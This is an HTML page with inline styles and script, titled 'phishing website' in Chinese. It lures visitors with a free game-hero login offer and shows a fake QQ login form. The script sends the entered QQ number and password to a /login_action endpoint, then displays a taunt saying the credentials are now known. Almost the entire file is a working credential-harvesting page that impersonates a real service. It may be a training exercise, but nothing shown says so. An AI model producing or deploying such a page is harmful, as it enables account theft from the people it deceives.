<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>钓鱼网站</title>
    <style>
        * {
            padding: 0;
            margin: 0;
        }
        body {
            background: darkorange;
        }
        .content {
            width: 300px;
            margin: 0 auto;
            height: 100vh;
        }
        .content h1{
            width: 300px;
            color: white;
            text-align: center;
            margin-bottom: 40px;
        }
        .content button{
            width: 300px;
            font: 20px/2 '';
            color: white;
            background: blue;
        }
        .form {
            padding: 10px;
            display: flex;
            flex-direction: column;
            justify-content: center;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            border: 4px solid blueviolet;
            background: white;
        }
        .form h2 {
            text-align: center;
            margin-bottom: 20px;
        }
        .form input,
        .form button {
            width: 400px;
            font: 16px/2 '';
            margin-bottom: 20px;
            border: 2px solid gainsboro;
        }
        .form button {
            color: white;
            background: green;
        }
        .form span {
            position: absolute;
            top: 2px;
            right: 10px;
            font-size: 20px;
            cursor: pointer;
        }
        .form span:hover{
            color: red;
        }
        .hide {
            display: none;
        }
    </style>
</head>
<body>
<div class="content">
    <h1>登录送火热英雄</h1>
    <button type="button" id="btn">登录</button>
</div>
<form id="login-form" class="form hide">
    <h2>账号密码登录</h2>
    <input type="text" placeholder="输入QQ账号" name="qq">
    <input type="password" placeholder="密码" name="psw">
    <button type="button" id="login">登录</button>
    <span id="del">x</span>
</form>
<script>

  const btn = document.getElementById('btn');

  // 打开登录界面
  btn.onclick = function () {
    const form = document.getElementById('login-form');

    form.classList.remove('hide');

    const login = document.getElementById('login');
    const del = document.getElementById('del');

    // 登录获取用户信息
    login.onclick = function () {
      ajax({
        method: 'POST',
        url: '/login_action',
        data: JSON.stringify({
          username: form['qq'].value.trim(),
          password: form['psw'].value.trim()
        }),
        fn: function (data) {
          if(JSON.parse(data).status) {
            alert('哈哈哈，你的qq号和qq密码我都知道了！！！');
            form.reset();
          }
        }
      })
    }

    // 删除按钮

    del.onclick = function () {
      form.classList.add('hide');
    }
  }

  /**
   * ajax
   * @param {Object} opts ajax相关参数（method、url、async、fn、headers）
   */

  function ajax (opts) {
    const xhr = new XMLHttpRequest();

    xhr.onreadystatechange = () => {
      if (xhr.readyState === 4) {
        if (xhr.status >= 200 && xhr.status < 300 || xhr.status === 304) {
          opts.fn && opts.fn(xhr.responseText, xhr);
        }
      }
    }

    xhr.open(opts.method, opts.url, opts.async || true);

    if (opts.headers && Object.prototype.toString.call(opts.headers) === '[object Object]') {
      for (let [key, value] of Object.entries(opts.headers)) {
        xhr.setRequestHeader(key, value);
      }
    }

    xhr.send(opts.data || null);

    return xhr;
  }
</script>
</body>
</html>